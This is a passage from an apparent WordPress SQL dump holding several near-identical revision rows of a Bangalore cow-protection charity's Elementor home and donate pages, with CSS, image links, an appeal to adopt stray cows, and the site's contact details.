some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-19 18:02:13','2022-10-19 12:32:13','',1816,'https://gopalak.in/?p=1883',0,'revision','',0),(1884,1,'2022-10-19 18:02:13','2022-10-19 12:32:13','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-19 18:02:13','2022-10-19 12:32:13','',1816,'https://gopalak.in/?p=1884',0,'revision','',0),(1885,1,'2022-10-19 18:02:13','2022-10-19 12:32:13','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-19 18:02:13','2022-10-19 12:32:13','',1816,'https://gopalak.in/?p=1885',0,'revision','',0),(1886,1,'2022-10-19 18:04:59','2022-10-19 12:34:59','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-19 18:04:59','2022-10-19 12:34:59','',1373,'https://gopalak.in/?p=1886',0,'revision','',0),(1887,1,'2022-10-19 18:04:59','2022-10-19 12:34:59','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-19 18:04:59','2022-10-19 12:34:59','',1373,'https://gopalak.in/?p=1887',0,'revision','',0),(1888,1,'2022-10-19 18:04:59','2022-10-19 12:34:59','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is 